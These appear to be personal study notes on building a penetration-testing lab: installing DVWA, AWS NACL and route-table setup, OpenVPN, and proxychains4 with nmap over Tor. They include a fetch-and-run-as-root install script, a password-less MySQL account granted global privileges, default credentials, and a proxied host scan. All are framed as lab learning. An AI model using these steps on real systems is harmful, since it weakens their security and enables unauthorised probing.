> See: [DAY 20: connect to the EC2 instance and install Docker](https://ithelp.ithome.com.tw/articles/10334594)
The steps are identical to "0. Installing Docker" in the penetration-testing section above (`apt update`, install the prerequisites, add Docker's GPG key and apt repository, `apt-cache policy docker-ce`, `apt install docker-ce`, check `docker --version`, add the user to the docker group, start the service and run `docker ps`), so they are not repeated here.
## 2. Pull the DVWA pre-built image with Docker
![image](https://hackmd.io/_uploads/SkNMmrb0T.png)
>
Download link: [DVWA pre-built image](https://github.com/digininja/DVWA/pkgs/container/dvwa)
* Command: `sudo docker pull ghcr.io/digininja/dvwa:1232568`
![image](https://hackmd.io/_uploads/ByRVQHW0T.png)
### Note: double-check docker and docker compose
* `sudo docker compose version`
* `sudo docker version`
![image](https://hackmd.io/_uploads/BybsEH-Cp.png)
## 3. Install DVWA
### Commands
![image](https://hackmd.io/_uploads/ry6CBBWRT.png)
![image](https://hackmd.io/_uploads/SJN06FbCa.png)
* `wget https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh`
  (a third-party install script that will be run as root; read it before executing it)
![image](https://hackmd.io/_uploads/ryFr8BZ0T.png)
* `chmod +x Install-DVWA.sh`
* `sudo ./Install-DVWA.sh`
### It ran successfully!
![image](https://hackmd.io/_uploads/r18P8rZRp.png)
During the install you can set a database password; pressing Enter means no password
![image](https://hackmd.io/_uploads/BkGpvB-CT.png)
* Afterwards, log in at `http://localhost/DVWA/login.php` with the account and password you just set
![image](https://hackmd.io/_uploads/B1Z9F8-Aa.png)
* Login screen:
![image](https://hackmd.io/_uploads/HJ8ptUWA6.png)
* The DVWA default login is user `admin`, password `password`
![image](https://hackmd.io/_uploads/SJEl0I-A6.png)

# Part 2. DVWA environment setup
> MySQL steps reference: [Hands-on workshop: DVWA (Damn Vulnerable Web Application)](https://lin19921127.medium.com/%E5%AF%A6%E6%88%B0%E5%B7%A5%E4%BD%9C%E5%9D%8A-dvwa-damn-vulnerable-web-application-253f1b11fa8a)
> DVWA usage reference:
[Getting started with penetration testing: building and using the DVWA lab (illustrated)](https://blog.csdn.net/m0_60884805/article/details/127086871)
## 1. MySQL
* `sudo mysql`
![image](https://hackmd.io/_uploads/BkDqRU-0p.png)
* `CREATE USER 'dvwa'@'localhost' IDENTIFIED BY '';`
  (use straight ASCII quotes; the curly quotes ‘ ’ that copy-paste produces are a syntax error in MySQL)
![image](https://hackmd.io/_uploads/SyK7JD-C6.png)
* `SELECT user, host, password FROM mysql.user;`
  (works on MariaDB; on MySQL 5.7 and later the column is called `authentication_string`)
![image](https://hackmd.io/_uploads/Sy3i1vWCp.png)
* `GRANT ALL PRIVILEGES ON *.* TO 'dvwa'@'localhost';`
  (DVWA only needs rights on its own `dvwa` database; `*.*` gives a password-less account full control of every database on the host, which is acceptable only inside a throwaway lab VM)
![image](https://hackmd.io/_uploads/B1UexDZAa.png)
* `FLUSH PRIVILEGES;`
![image](https://hackmd.io/_uploads/rkSNlPW0p.png)
* Leave MySQL: `\q`
![image](https://hackmd.io/_uploads/BJ4jgwZAa.png)
## 2. Sidebar functions (environment setup)
### 1. Setup / Reset DB
After logging in, choose Setup/Reset DB in the sidebar --> the "Create / Reset Database" button creates a fresh database
![image](https://hackmd.io/_uploads/S1x3WwZ06.png)
### 2. DVWA Security
Sets the difficulty level of the challenges
![image](https://hackmd.io/_uploads/S1odGv-AT.png)
Level descriptions
![image](https://hackmd.io/_uploads/S1hlhDZ0a.png)

# Defence strategy and firewall configuration

# Part 1. References
> See: preparing IT controls for a listing audit, [2010 iT 邦幫忙鐵人賽: IT listing know-how](https://ithelp.ithome.com.tw/users/20000375/ironman/180)
> See: [[IT listing know-how] 22. Firewall configuration](https://ithelp.ithome.com.tw/articles/10056261)
> See: [Stateful vs.
Stateless Firewall](https://www.linkedin.com/pulse/stateful-vs-stateless-firewall-rajneesh-gupta-df8kf/)
> See: [What is a next-generation firewall (NGFW)?](https://www.cloudflare.com/zh-tw/learning/security/what-is-next-generation-firewall-ngfw/)
## 1. Cloud
> See: [The Infinity Gauntlet, AWS edition: 5 + 1 must-learn cloud topics](https://ithelp.ithome.com.tw/users/20100951/ironman/4671)
> [Amazon Cloud Service 30 days challenge](https://ithelp.ithome.com.tw/users/20083507/ironman/1366)
## 2. Connectivity
> See: [AWS VPC NACL](https://medium.com/@bayaansanni/aws-vpc-nacl-58d414efc328)

# Part 2. Hands-on steps
> See: [AWS study notes (1): Deploy ENV/EC2](https://medium.com/jacky-life/aws-%E5%AD%B8%E7%BF%92%E7%AD%86%E8%A8%98-1-deploy-env-ec2-ea5e5f56d936)
> See: [AWS study notes (2): NAT/Container Service](https://medium.com/jacky-life/aws-%E5%AD%B8%E7%BF%92%E7%AD%86%E8%A8%98-2-nat-container-service-e23d78f1ab55)
> See: [AWS study notes (3): Deploy ELB](https://medium.com/jacky-life/aws-%E5%AD%B8%E7%BF%92%E7%AD%86%E8%A8%98-3-deploy-elb-2b0d86c776f7)
## 1. Use the default VPC and create a subnet group
Current state: one security group plus one public subnet containing two EC2 instances (only the left half of the diagram below; no private subnet has been created)
![image](https://hackmd.io/_uploads/SJBrg0cAa.png)
> See: [AWS study notes (2): NAT/Container Service](https://medium.com/jacky-life/aws-%E5%AD%B8%E7%BF%92%E7%AD%86%E8%A8%98-2-nat-container-service-e23d78f1ab55)
### Current Resource Map
![image](https://hackmd.io/_uploads/HyJUNA506.png)
## 2. Create a NACL (Network ACL)
VPC --> Network ACLs --> Create network ACL
![image](https://hackmd.io/_uploads/Hkff7A906.png)
## 3. Inbound rules
### A newly created custom NACL denies everything, so allow rules have to be added
![image](https://hackmd.io/_uploads/ryifA65R6.png)
* All traffic
* All TCP
* Custom TCP, ports 1024-49151 (0-65535 would be the same as All TCP)
* RDP --> remote desktop
* SSH (Secure Shell)
* ICMP --> ping, network probing, error reporting
* HTTP
* HTTPS
### Port numbers
TCP port numbers run from 0 to 65535 and are divided into three ranges (so 0-65535 is the same as All TCP):
1. **Well-known ports**: 0 to 1023, used by widely deployed services, for example HTTP (port 80) and HTTPS (port 443).
2. **Registered ports**: 1024 to 49151, registered with IANA for particular applications but not as universal as the well-known ports.
3.
**Dynamic or private ports**: 49152 to 65535, normally chosen by the client operating system as the source port of a connection to a server. In practice Linux picks client ports from 32768-60999 by default and Windows from 49152-65535, which is why AWS recommends 1024-65535 as the "ephemeral port" range in NACL rules rather than 49152-65535 or the 1024-49151 used above.
## 4. Outbound rules
![image](https://hackmd.io/_uploads/ryqS10qCT.png)
* All ICMP
* All TCP
## 5. Route tables
### Associate the subnet with the route table
VPC --> Route Tables --> Edit subnet associations --> Save associations
![image](https://hackmd.io/_uploads/BJ8MSRqA6.png)
### Routes
* igw (Internet Gateway) for 0.0.0.0/0
* local for the VPC's own CIDR
![image](https://hackmd.io/_uploads/BkuoBAqRp.png)
### Subnet associations
* Explicit subnet associations --> shows the subnet just added
* **Note**: because there is only one public subnet, the Resource Map looks the same before and after
![image](https://hackmd.io/_uploads/Syaf8CqC6.png)

# Part 3. Questions about AWS NACLs
1. Inbound vs outbound rules
   * Inbound rules apply to traffic entering the subnet, for example from our PC to the EC2 instance, so the source is our address (the company's public IP as shown by ipinfo) and the port is the service port on the host
2. How to block only one specific IP (by source / destination), e.g. our own machine 172.18.2.214/23
   * Add a Deny rule whose source is that host's CIDR. A single host is a /32, i.e. 172.18.2.214/32; a /23 covers 512 addresses. Give the deny a lower rule number than the allow rules, because a NACL evaluates rules in ascending number order and stops at the first match
3. Stateless vs stateful cloud firewalls
   * The same concepts as on-premises; the cloud is an extension of on-prem. A stateless filter (NACL) judges each packet on its own, so the return traffic of a connection must be allowed explicitly; a stateful one (security group) remembers the connection and admits the reply automatically
4. Why are HTTP, HTTPS, SSH and ICMP listed separately, when **opening only them does not connect** but All TCP or Custom TCP opens everything?
   * Each of those rules opens a single service port for a given source
   * Analogy: a house with many doors, all locked by default; a whitelist lets a given visitor (source IP) in only through one specific door (port)
   * One common reason "only those" fails is the stateless model: inbound SSH (22) is allowed, but the SSH server's replies leave the subnet towards the client's ephemeral port, so the outbound rules must allow 1024-65535 as well. All TCP "fixes" it by allowing everything
5. Why does the private subnet's route table need three routes rather than two
   * One is the `local` route that every route table has by default (everything in the same VPC is routed locally); the others are the routes we add ourselves
6. Is NAT mainly about translating the private subnet to public?
   * A NAT gateway lets instances in a private subnet initiate outbound connections (updates, package downloads) through the gateway's public IP, while nothing on the internet can initiate a connection to them
![image](https://hackmd.io/_uploads/HyGHb0qC6.png)
7. NGFW vs cloud firewall: [Next-generation firewall (NGFW) vs firewall-as-a-service (FWaaS)](https://www.cloudflare.com/zh-tw/learning/cloud/ngfw-vs-fwaas/)
![image](https://hackmd.io/_uploads/SJhjzAq06.png)
### Notes
* A security group is allow-only and stateful: it can only contain allow rules, and the reply traffic of an allowed connection is admitted automatically. A NACL is stateless and holds both allow and deny rules, evaluated in number order with an implicit final deny. The shorthand "security group = whitelist, NACL = blacklist" is only half right: a custom NACL starts as deny-all, so it is a whitelist too; what sets it apart is that it can also express explicit denies, such as blocking one IP
* The cloud already provides firewall functionality by default, but the concepts are easier to understand as an extension of on-prem firewalls, where nothing is configured for you
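The following is an added example, not from these notes or from any AWS tool: a toy model of how a network ACL decides, covering questions 2, 3 and 4 above. Rules are tried in ascending rule-number order, the first match wins, and the implicit final rule denies. Because the NACL keeps no connection state, the SYN-ACK of an allowed SSH session has to match an outbound rule on its own, which is where the ephemeral-port range comes in. The CIDRs, ports and addresses are constructed.

```python
"""Added example: a toy stateless NACL evaluator. Rule numbers, CIDRs,
addresses and ports are constructed for the demo."""
from dataclasses import dataclass
import ipaddress


@dataclass(frozen=True)
class Rule:
    number: int
    protocol: str        # "tcp", "udp", "icmp" or "all"
    port_lo: int         # destination port range; ignored for icmp / all
    port_hi: int
    cidr: str            # source CIDR for inbound, destination for outbound
    action: str          # "allow" or "deny"


@dataclass(frozen=True)
class Packet:
    protocol: str
    src_ip: str
    dst_ip: str
    src_port: int
    dst_port: int


def _matches(rule: Rule, pkt: Packet, direction: str) -> bool:
    if rule.protocol not in ("all", pkt.protocol):
        return False
    if rule.protocol in ("tcp", "udp") and not (rule.port_lo <= pkt.dst_port <= rule.port_hi):
        return False
    ip = pkt.src_ip if direction == "inbound" else pkt.dst_ip
    return ipaddress.ip_address(ip) in ipaddress.ip_network(rule.cidr)


def evaluate(rules, pkt: Packet, direction: str) -> str:
    """Return 'allow' or 'deny' for one packet in one direction:
    lowest rule number first, first match wins, '*' denies."""
    for rule in sorted(rules, key=lambda r: r.number):
        if _matches(rule, pkt, direction):
            return rule.action
    return "deny"


def ssh_session_ok(inbound, outbound, client_ip, host_ip, client_port=51515) -> bool:
    """A TCP session needs the SYN in *and* the SYN-ACK back out. The
    reply's destination port is the client's ephemeral port, not 22, and
    the NACL has no memory of the SYN that caused it."""
    syn = Packet("tcp", client_ip, host_ip, client_port, 22)
    reply = Packet("tcp", host_ip, client_ip, 22, client_port)
    return (evaluate(inbound, syn, "inbound") == "allow"
            and evaluate(outbound, reply, "outbound") == "allow")


ANY = "0.0.0.0/0"
INBOUND_SSH_ONLY = [Rule(100, "tcp", 22, 22, ANY, "allow")]
OUTBOUND_NONE = []                                                    # custom NACL default
OUTBOUND_REGISTERED = [Rule(100, "tcp", 1024, 49151, ANY, "allow")]   # the range used above
OUTBOUND_EPHEMERAL = [Rule(100, "tcp", 1024, 65535, ANY, "allow")]    # AWS recommendation
# Blocking one host: the deny must sort *before* the broad allow.
INBOUND_BLOCK_ONE = [Rule(50, "all", 0, 65535, "172.18.2.214/32", "deny"),
                     Rule(100, "tcp", 22, 22, ANY, "allow")]
INBOUND_BLOCK_TOO_LATE = [Rule(100, "tcp", 22, 22, ANY, "allow"),
                          Rule(200, "all", 0, 65535, "172.18.2.214/32", "deny")]

if __name__ == "__main__":
    for name, out in (("none", OUTBOUND_NONE), ("1024-49151", OUTBOUND_REGISTERED),
                      ("1024-65535", OUTBOUND_EPHEMERAL)):
        ok = ssh_session_ok(INBOUND_SSH_ONLY, out, "203.0.113.5", "10.0.0.10")
        print(f"SSH with outbound {name:10s}: {'works' if ok else 'hangs'}")
```

A security group needs none of this bookkeeping because it tracks the connection; that is the practical meaning of "stateful" in question 3, and the reason most day-to-day filtering is done in security groups while NACLs are reserved for coarse subnet-level denies.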
# Part 4. Site-to-site VPN
* Site-to-site means two separate networks connected through a VPN tunnel
* Example: two companies, each with its own network, set up a site-to-site VPN between them
* It can be simulated with two EC2 instances in different VPCs
> 1. [How AWS Site-to-Site VPN works](https://docs.aws.amazon.com/zh_tw/vpn/latest/s2svpn/how_it_works.html)
> 2. [Building a Site-to-Site VPN on a custom port with OpenVPN on AWS](https://aws.amazon.com/cn/blogs/china/setup-site-to-site-vpn-with-openvpn/)
> 3. [How to install OpenVPN on Ubuntu 22.04 / 20.04](https://cn.linux-console.net/?p=1561)
> 4. [Install OpenVPN on Ubuntu in 3 minutes](https://donggan.me/post/install-openvpn-on-ubuntu-in-3min/)
![image](https://hackmd.io/_uploads/rkPL_8ARa.png)
`sudo systemctl status openvpn`
![image](https://hackmd.io/_uploads/BJKt_LR0T.png)
![image](https://hackmd.io/_uploads/ByW0uUR06.png)
* `sudo apt update` (the note originally had `sudo update`, which is not a command)
* `sudo apt install openvpn easy-rsa`
![image](https://hackmd.io/_uploads/rJpMqPART.png)
* `mk` (an unfinished `mkdir`; the complete command is on the next line)
![image](https://hackmd.io/_uploads/SJcY9vR0p.png)
* `mkdir ~/easy-rsa`
* `ln -s /usr/share/easy-rsa/* ~/easy-rsa/`
* `sudo chown sammy ~/easy-rsa` then `chmod 700 ~/easy-rsa` (`sammy` is the example user in the tutorial being followed; use your own user, e.g. `ubuntu`, or `chown` fails with "invalid user")
![image](https://hackmd.io/_uploads/By-0qwCAT.png)

# Part 5. Switch to GNOME (a nicer-looking Ubuntu desktop with more defaults)

## 1. Install the GUI and grant sudo with visudo
> See: [Vulnerability scanning: operation log](https://ithelp.ithome.com.tw/articles/10341989)
* In [【Cloud】Connecting to an AWS Ubuntu VM over Remote Desktop](https://learningsky.io/remote-desktop-connect-aws-ubuntu-vm/), replace `xfce4` with `gnome`
## 2. Install Chinese fonts / switch input method
* Settings --> Region & Language --> Manage Installed Languages --> Install language
![image](https://hackmd.io/_uploads/BJwy3tAC6.png)
![image](https://hackmd.io/_uploads/ryfym5ARp.png)
* `sudo passwd ubuntu`: sets a password for the ubuntu account (needed for the xrdp login). Now that the account has a password, make sure `PasswordAuthentication no` stays set in sshd so SSH still requires the key.
### Install Chrome (instead of the default Firefox)
![image](https://hackmd.io/_uploads/B1ypB900a.png)
> See: [Vulnerability scanning: operation log](https://ithelp.ithome.com.tw/articles/10341989)
* Install a Chinese input method
> See: [Traditional Chinese input on Ubuntu? Switch to Fcitx5](https://ivonblog.com/posts/ubuntu-fcitx5/)
* Note:
switch the system language to Taiwan first
* Then open Keyboard --> a new Chewing (新酷音) keyboard option appears
![image](https://hackmd.io/_uploads/HyFNZoRRa.png)
* Zhuyin input works!
![image](https://hackmd.io/_uploads/HyIzzs0Rp.png)
### Open the system monitor
* Command: `gnome-system-monitor`
* Processes
![image](https://hackmd.io/_uploads/B1eUv9RAT.png)
* Resources
![image](https://hackmd.io/_uploads/rkGsv5ARa.png)
* File systems
![image](https://hackmd.io/_uploads/B1TsPcRCa.png)
* Command `df -h`: shows the disk partitions and their usage
![image](https://hackmd.io/_uploads/HJZlPsA06.png)
### Ubuntu shortcuts
* `Super` (Windows key) --> zoom out to the activities overview
![image](https://hackmd.io/_uploads/BkEaqi0CT.png)
* `Tab` --> switch desktops / windows
![image](https://hackmd.io/_uploads/B1seosACp.png)
* `su`: switch to the superuser (on Ubuntu root has no password, so use `sudo -i` or `sudo su`)
* `exit`: back to the normal user

# Part 6. Port forwarding and Proxychains4
> See: [SSH tunnelling (SSH port forwarding)](https://ithelp.ithome.com.tw/articles/10332572)
> See: [CPENT study notes for penetration-testing beginners, part 12: application proxying with ProxyChains](https://ithelp.ithome.com.tw/articles/10328383)
##
一、安裝/設定Proxychains4 > 參考: [Ubuntu安装Proxychains4](https://blog.csdn.net/lan120576664/article/details/100784380) * `sudo apt-get update` * `sudo apt-get install proxychains4` * `sudo nano /etc/proxychains4.conf` * 在設定檔新增`socks 127.0.0.1 9050` ![image](https://hackmd.io/_uploads/SJ47Qs0CT.png) ## 二、安裝Nmap * `sudo apt update` * `sudo apt install nmap` * `proxychains4 nmap -sn 192.168.0.7` ![image](https://hackmd.io/_uploads/SJyhg2CRa.png) ## 三、官方文檔 > [ProxyChains ver. 4.3.0](https://github.com/haad/proxychains) ### 問題 官網範例或是wget google均出現"timeout"問題 * `proxychains4 telnet targethost.com` ![image](https://hackmd.io/_uploads/BJ9T5hARp.png) 但firefox可以成功開啟 * `proxychains4 firefox` ![image](https://hackmd.io/_uploads/SJwDo3R06.png) ### Q: 是Proxychains4設定檔的問題 or cloud上firewall subnet group inbound ports rule問題? ### 查看設定檔 * 檔案 --> 其他的位置 --> /etc --> 搜尋Proxy --> 開啟`proxychain4.config`檔案 ![image](https://hackmd.io/_uploads/ByiUR20RT.png) ![image](https://hackmd.io/_uploads/r1M5An0CT.png) ``` # proxychains.conf VER 4.x # # HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS. # The option below identifies how the ProxyList is treated. # only one option should be uncommented at time, # otherwise the last appearing option will be accepted # #dynamic_chain # # Dynamic - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # at least one proxy must be online to play in chain # (dead proxies are skipped) # otherwise EINTR is returned to the app # strict_chain # # Strict - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # all proxies must be online to play in chain # otherwise EINTR is returned to the app # #round_robin_chain # # Round Robin - Each connection will be done via chained proxies # of chain_len length # all proxies chained in the order as they appear in the list # at least one proxy must be online to play in chain # (dead proxies are skipped). 
# the start of the current proxy chain is the proxy after the last
# proxy in the previously invoked proxy chain.
# if the end of the proxy chain is reached while looking for proxies
# start at the beginning again.
# otherwise EINTR is returned to the app
# These semantics are not guaranteed in a multithreaded environment.
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain or round_robin_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

## Proxy DNS requests - no leak for DNS data
# (disable all of the 3 items below to not proxy your DNS requests)

# method 1. this uses the proxychains4 style method to do remote dns:
# a thread is spawned that serves DNS requests and hands down an ip
# assigned from an internal list (via remote_dns_subnet).
# this is the easiest (setup-wise) and fastest method, however on
# systems with buggy libcs and very complex software like webbrowsers
# this might not work and/or cause crashes.
proxy_dns

# method 2. use the old proxyresolv script to proxy DNS requests
# in proxychains 3.1 style. requires `proxyresolv` in $PATH
# plus a dynamically linked `dig` binary.
# this is a lot slower than `proxy_dns`, doesn't support .onion URLs,
# but might be more compatible with complex software like webbrowsers.
#proxy_dns_old

# method 3. use proxychains4-daemon process to serve remote DNS requests.
# this is similar to the threaded `proxy_dns` method, however it requires
# that proxychains4-daemon is already running on the specified address.
# on the plus side it doesn't do malloc/threads so it should be quite
# compatible with complex, async-unsafe software.
# note that if you don't start proxychains4-daemon before using this,
# the process will simply hang.
#proxy_dns_daemon 127.0.0.1:1053

# set the class A subnet number to use for the internal remote DNS mapping
# we use the reserved 224.x.x.x range by default,
# if the proxified app does a DNS request, we will return an IP from that range.
# on further accesses to this ip we will send the saved DNS name to the proxy.
# in case some control-freak app checks the returned ip, and denies to
# connect, you can use another subnet, e.g. 10.x.x.x or 127.x.x.x.
# of course you should make sure that the proxified app does not need
# *real* access to this subnet.
# i.e. dont use the same subnet then in the localnet section
#remote_dns_subnet 127
#remote_dns_subnet 10
remote_dns_subnet 224

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

### Examples for localnet exclusion
## localnet ranges will *not* use a proxy to connect.
## note that localnet works only when plain IP addresses are passed to the app,
## the hostname resolves via /etc/hosts, or proxy_dns is disabled or proxy_dns_old used.

## Exclude connections to 192.168.1.0/24 with port 80
# localnet 192.168.1.0:80/255.255.255.0

## Exclude connections to 192.168.100.0/24
# localnet 192.168.100.0/255.255.255.0

## Exclude connections to ANYwhere with port 80
# localnet 0.0.0.0:80/0.0.0.0
# localnet [::]:80/0

## RFC6890 Loopback address range
## if you enable this, you have to make sure remote_dns_subnet is not 127
## you'll need to enable it if you want to use an application that
## connects to localhost.
# localnet 127.0.0.0/255.0.0.0
# localnet ::1/128

## RFC1918 Private Address Ranges
# localnet 10.0.0.0/255.0.0.0
# localnet 172.16.0.0/255.240.0.0
# localnet 192.168.0.0/255.255.0.0

### Examples for dnat
## Trying to proxy connections to destinations which are dnatted,
## will result in proxying connections to the new given destinations.

## Whenever I connect to 1.1.1.1 on port 1234 actually connect to 1.1.1.2 on port 443
# dnat 1.1.1.1:1234 1.1.1.2:443

## Whenever I connect to 1.1.1.1 on port 443 actually connect to 1.1.1.2 on port 443
## (no need to write :443 again)
# dnat 1.1.1.2:443 1.1.1.2

## No matter what port I connect to on 1.1.1.1 port actually connect to 1.1.1.2 on port 443
# dnat 1.1.1.1 1.1.1.2:443

## Always, instead of connecting to 1.1.1.1, connect to 1.1.1.2
# dnat 1.1.1.1 1.1.1.2

# ProxyList format
#       type  ip  port [user pass]
#       (values separated by 'tab' or 'blank')
#
#       only numeric ipv4 addresses are valid
#
#
#        Examples:
#
#            socks5  192.168.67.78  1080  lamer  secret
#            http    192.168.89.3   8080  justu  hidden
#            socks4  192.168.1.49   1080
#            http    192.168.39.93  8080
#
#
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9050
http 192.168.0.1 8080
```

> The complete configuration file, shown in full above.

### Current port status
* `nc -zv 127.0.0.1 9050`: a TCP connect test for the proxy listed in `[ProxyList]` (9050 is Tor's default SOCKS port; substitute any other port to test it). See the figure:
![image](https://hackmd.io/_uploads/Hy2qf60Aa.png)
* `sudo ss -tuln`: lists every listening TCP and UDP port
![image](https://hackmd.io/_uploads/HyfcQp00T.png)

The figure shows that the only listening ports are
* 22
* 53
* 3389
* 3350

22 is sshd, 53 a local DNS listener, and 3389 and 3350 are xrdp and its session manager xrdp-sesman. Nothing is bound to 9050, so the `socks5 127.0.0.1 9050` entry above points at a Tor daemon that is not running; until `tor` is started, proxychains cannot use that proxy, and in the default `strict_chain` mode a single dead proxy fails every connection.

# 7. Site-to-Site VPN
* [Getting started with AWS Site-to-Site VPN](https://docs.aws.amazon.com/vpn/latest/s2svpn/SetUpVPNConnections.html)

Finished today:
1. Launched EC2 instances in two different VPCs
2. Worked out the steps for connecting the two VPCs site to site
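Back to the proxychains configuration and the two port checks above: the script below is an added example for these notes (it is not part of proxychains) that does the same checks without a terminal session. It parses the `[ProxyList]`, `proxy_dns*`, `remote_dns_subnet` and `localnet` directives from a constructed copy of the settings shown above, reports the misconfigurations the file's own comments warn about (no DNS proxying at all, `remote_dns_subnet` clashing with a `localnet` range, a hostname instead of a numeric IPv4 in the proxy list), and performs the `nc -zv` connect test from Python. Function names such as `parse_proxychains` and `audit` are this example's own.

```python
"""Pre-flight check for a proxychains configuration.

Added example for these notes; it is not part of proxychains. It reads the
directives the checks need, flags the problems the config comments warn
about, and replaces `nc -zv host port` with a TCP connect from Python.
"""
import ipaddress
import socket

# Constructed sample mirroring the settings shown above. 127.0.0.1:9050 is
# Tor's default SOCKS port; 192.168.0.1:8080 is the notes' HTTP proxy entry.
SAMPLE_CONF = """\
strict_chain
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
# localnet 127.0.0.0/255.0.0.0
[ProxyList]
# defaults set to "tor"
socks5  127.0.0.1 9050
http 192.168.0.1 8080
"""

DNS_MODES = ("proxy_dns", "proxy_dns_old", "proxy_dns_daemon")
CHAIN_MODES = ("strict_chain", "dynamic_chain", "round_robin_chain", "random_chain")
PROXY_TYPES = ("http", "socks4", "socks5", "raw")


def parse_proxychains(text):
    """Minimal parser for the directives this check needs.

    Like proxychains itself, only lines whose first character is '#' are
    comments; every line after '[ProxyList]' is a proxy entry.
    """
    cfg = {"chain": "strict_chain", "dns_mode": None, "remote_dns_subnet": 224,
           "localnet": [], "proxies": []}
    in_proxylist = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_proxylist = line.lower() == "[proxylist]"
            continue
        if in_proxylist:
            parts = line.split()
            if len(parts) >= 3 and parts[2].isdigit():
                cfg["proxies"].append({"type": parts[0], "host": parts[1],
                                       "port": int(parts[2]), "auth": len(parts) >= 5})
            continue
        key, _, value = line.partition(" ")
        value = value.strip()
        if key in CHAIN_MODES:
            cfg["chain"] = key
        elif key in DNS_MODES:
            cfg["dns_mode"] = key
        elif key == "remote_dns_subnet" and value.isdigit():
            cfg["remote_dns_subnet"] = int(value)
        elif key == "localnet":
            cfg["localnet"].append(value)
    return cfg


def audit(cfg):
    """Static findings: DNS leak, remote_dns_subnet clashing with localnet, bad proxy entries."""
    findings = []
    if cfg["dns_mode"] is None:
        findings.append("DNS leak: no proxy_dns/proxy_dns_old/proxy_dns_daemon, "
                        "name lookups go out unproxied")
    for net in cfg["localnet"]:
        # localnet syntax is [ip][:port]/mask, e.g. 127.0.0.0/255.0.0.0 or 192.168.1.0:80/255.255.255.0
        first_octet = net.split("/", 1)[0].split(":", 1)[0].split(".", 1)[0]
        if first_octet.isdigit() and int(first_octet) == cfg["remote_dns_subnet"]:
            findings.append(f"remote_dns_subnet {cfg['remote_dns_subnet']} overlaps localnet {net}: "
                            "the fake DNS answers would be connected to directly instead of via the proxy")
    for p in cfg["proxies"]:
        if p["type"] not in PROXY_TYPES:
            findings.append(f"unknown proxy type {p['type']!r}")
        try:
            ipaddress.IPv4Address(p["host"])
        except ValueError:
            findings.append(f"{p['type']} {p['host']}: only numeric IPv4 addresses are valid in [ProxyList]")
    return findings


def port_open(host, port, timeout=1.0):
    """TCP connect test, the scripted equivalent of `nc -zv host port`."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_proxies(cfg, timeout=1.0):
    """Live check: (type, host, port, listening) for every [ProxyList] entry."""
    return [(p["type"], p["host"], p["port"], port_open(p["host"], p["port"], timeout))
            for p in cfg["proxies"]]


if __name__ == "__main__":
    cfg = parse_proxychains(SAMPLE_CONF)
    for msg in audit(cfg):
        print("WARN", msg)
    results = check_proxies(cfg)
    for ptype, host, port, up in results:
        print(f"{ptype} {host}:{port} -> {'listening' if up else 'NOT listening'}")
    if cfg["chain"] == "strict_chain" and not all(r[3] for r in results):
        print("strict_chain: one dead proxy aborts every proxied connection")
```

Run it against the real file with `parse_proxychains(open("/etc/proxychains4.conf").read())`; on the host above, the `socks5` entry comes back as not listening because no Tor daemon is bound to 9050, and the `http 192.168.0.1 8080` entry will time out unless that address is reachable. The parser deliberately copies proxychains' own rule of treating only lines that begin with `#` as comments, so a trailing comment on a proxy line would be parsed as credentials there as well.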
References for the site-to-site steps:
* [AWS Site-to-Site VPN, detailed steps](https://gemini.google.com/share/ce2bc58dff2e)
* [AWS tutorial: how to build a tunnel between two different VPCs, VPC peering walkthrough | study notes](https://www.bing.com/search?q=aws上兩個不同的vpc要如何建立site+to+site+vpc&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&sm=u&pq=aws上兩個不同的vpc要如何建立site+to+site+vpc&sc=6-33&sk=&cvid=85DDD7A1F5D4417494A62C6CB64DD5AD&ghsh=0&ghacc=0&ghpl=)

VPC peering and Site-to-Site VPN are different mechanisms: peering links two VPCs over the AWS network with route-table entries and no tunnel, while Site-to-Site VPN terminates IPsec tunnels between a virtual private gateway (or transit gateway) and a customer gateway device, optionally exchanging routes over BGP.

## Reference procedure
[AWS hybrid cloud: a step-by-step guide to an AWS to on-premises IPsec VPN with BGP dynamic routing](https://awstip.com/aws-site-to-site-vpn-set-up-with-bgp-routing-4e6475952075)
![image](https://hackmd.io/_uploads/r1XodimyR.png)
![image](https://hackmd.io/_uploads/SkJTusXyA.png)
![image](https://hackmd.io/_uploads/r1w0usQkC.png)

---

# 1. AWS pricing model notes
### [Pricing Calculator](https://calculator.aws/#/createCalculator/CloudTrail)
### AWS Solutions Library
[Solutions for Cloud Operations](https://aws.amazon.com/tw/solutions/cloud-operations/)
## AWS Community Builders Program categories
1. Cloud Operations
2. Containers
3. Data
4. Dev Tools
5. Front-End Web & Mobile
6. Game Tech
7. Graviton Arm
8. Machine Learning
9. Networking & Content Delivery
10. Security & Identity
11. Serverless
12. Storage

# 2. Exploit-DB
> 1. [Day 10: exploit script search tool searchsploit (Exploitation tool - searchsploit)](https://ithelp.ithome.com.tw/articles/10321944)
> 2. [Entry-level security practice: learning network vulnerability scanning and exploitation with Hack The Box](https://ithelp.ithome.com.tw/users/20145688/ironman/6733)
> 3. [Finding exploit code: using exploit-db](https://cloud.tencent.com/developer/article/1399467)
> 4. [Kali Linux Web Penetration Testing Cookbook (2nd ed.), 7.1: exploiting Heartbleed with Exploit-DB](https://cloud.tencent.com/developer/article/1399467)

## 1. Articles from 資安飛飛
> [On the road into information security, Feifei leads the way](https://feifei.tw/)
![image](https://hackmd.io/_uploads/H10LzjPyA.png)

## Sumo Logic
[Introduction to Cloud SIEM](https://help.sumologic.com/docs/cse/introduction-to-cloud-siem/)
### Computer equipment
![image](https://hackmd.io/_uploads/H177XAgxC.png)
![image](https://hackmd.io/_uploads/B1IyVRelR.png)

---

![image](https://hackmd.io/_uploads/SJqrxY8eA.png)

# Exploit-DB
